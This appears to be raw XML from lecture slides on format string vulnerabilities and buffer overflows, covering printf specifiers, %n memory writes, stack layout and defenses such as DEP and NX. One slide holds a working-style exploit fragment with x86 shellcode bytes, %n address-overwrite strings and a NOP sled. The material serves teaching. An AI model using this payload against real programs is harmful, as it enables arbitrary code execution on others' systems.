              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'s to write to the addresses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00616"/>
      </p:ext>
    </p:extLst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236" y="764704"/>
            <a:ext cx="903649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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>shellcode += "\xeb\x1c\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t>shellcode += "\x0c\x89\xc2\x8d\x4b\x08\xb0\x0b\xcd\x80\x31\xdb\x89"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += "\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xdf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addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += "\x9c\xd5\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xffjunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += "\x9d\xd5\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xffjunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += "\x9e\xd5\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xffjunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += "\x9f\xd5\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"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += "%8x%8x%8x%8x"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += "%196x%n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += "%214x%n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += "%41x%n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> += "%256x%n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>puts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr_overwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + "\x90" * 200 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode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6352"/>
      </p:ext>
    </p:extLst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1328192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Buffer Overflow: Causes and Cures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>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Typical memory exploit involves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Put malicious code at a predictable location in memory, usually masquerading as data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Trick vulnerable program into passing control to it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Overwrite saved EIP, function callback pointer, etc.</a:t>
            </a:r>
          </a:p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C00000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>prevent execution of untrusted code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Make stack and other data areas non-executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Note: messes up useful functionality (e.g., ActionScript)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Digitally sign all code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Ensure that all control transfers are into a trusted, approved code image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6B016842-AF07-5C4F-9476-D50EC1FA32FA}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24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4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>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>X / DEP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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Mark all writeable memory locations as non-executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Example: Microsoft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DEP (Data Execution Prevention)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>This blocks all code injection exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Hardware support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>AMD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NX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 bit, Intel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XD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 bit (in post-2004 CPUs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Makes memory page non-executable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Widely deployed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Windows (since XP SP2), Linux (via PaX patches), OpenBSD, OS X (since 10.5)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DCA21079-E5C1-9645-AE08-2CE26D0AF9FA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592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length modifier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“%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hd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 descr="Screen Shot 2017-10-14 at 10.27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0125"/>
            <a:ext cx="8699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724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Counting bytes written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7"/>
            <a:ext cx="7776864" cy="2112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97152"/>
            <a:ext cx="82106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5837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E8A908A5-85D8-C142-A5D9-E1B122E34FF8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Variable Arguments in C</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma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479925" y="3328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5126" name="Picture 7" descr="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0" t="36296" r="38510" b="54875"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3543300"/>
            <a:ext cx="8001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32" name="Oval 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="3886200"/>
            <a:ext cx="457200" cy="3810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33" name="Oval 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="3886200"/>
            <a:ext cx="457200" cy="3810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34" name="Oval 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4191000"/>
            <a:ext cx="457200" cy="3810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35" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="4692650"/>
            <a:ext cx="4175041" cy="157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Format specification encoded by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special %-encoded characters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</a:rPr>
              <a:t> %d,%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,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o,%u,%x,%X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> – integer argument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</a:rPr>
              <a:t> %s – string argument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</a:rPr>
              <a:t> %p – pointer argument (void *)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</a:rPr>
              <a:t> Several others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18667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32" grpId="0" animBg="1"/>
      <p:bldP spid="1537033" grpId="0" animBg="1"/>
      <p:bldP spid="1537034" grpId="0" animBg="1"/>
      <p:bldP spid="15370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F30C8BF-B8A0-2C4C-A8C3-0E6AF0877397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371600" y="4114800"/>
            <a:ext cx="6172200" cy="838200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71600" y="2209800"/>
            <a:ext cx="7412038" cy="533400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640160"/>
            <a:ext cx="8458200" cy="50292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Proper use of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 format string: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000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>…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foo=1234; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>  		 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ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>foo =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%d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> in decimal,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%X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> in hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>foo,foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>); …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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>This will print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BA569"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>foo = 1234 in decimal, 4D2 in hex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Sloppy use of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 format string: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000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>[13]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Hello, world!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>  		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buf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800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>         // should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> used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ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>%s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>); …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1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latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>If buffer contains a format symbol starting with %, location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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>   pointed to by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>printf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internal stack pointer will be interpreted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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>   as an argument of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.  This can be exploited to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move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ahoma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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>printf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s internal stack pointer!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Format Strings in C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184011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1B244708-5958-6B47-BB7A-B02B8D548155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371600" y="2590800"/>
            <a:ext cx="5410200" cy="381000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371600" y="4221088"/>
            <a:ext cx="4876800" cy="533400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  <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> format symbol tells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 to write the number of characters that have been printed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000" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>…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ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Overflow this!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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>,&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>myVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>); …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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Argument of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 is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>interpeted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> as destination address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</a:rPr>
              <a:t>This writes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FBA569"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>myVar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What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> have an argument?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	… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>[16]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Overflow this!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%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>  		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buf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sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>; …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="20000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Tahoma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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Stack location pointed to by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>printf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s internal stack pointer will be interpreted as the address into which the number of characters will be written!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328192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Writing Stack with Format Strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198083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en-US" dirty="0" smtClean="0"/>
              <a:t>Stack Look</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2017-10-15 at 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92" y="2924944"/>
            <a:ext cx="2116708" cy="3933056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2017-10-15 at 2.5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800"/>
            <a:ext cx="9144001" cy="1301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399" y="3068960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bytes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2399" y="3491716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bytes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2399" y="4005064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52 bytes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212976"/>
            <a:ext cx="46085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CFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>executing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The first argument is a string pointer, starting to read string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Read a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” pop off a value and print it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Read a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” pop out an address and print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603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en-US" dirty="0" smtClean="0"/>
              <a:t>What will happen if replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(format, a, &amp;a, b, &amp;b) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CCFFCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
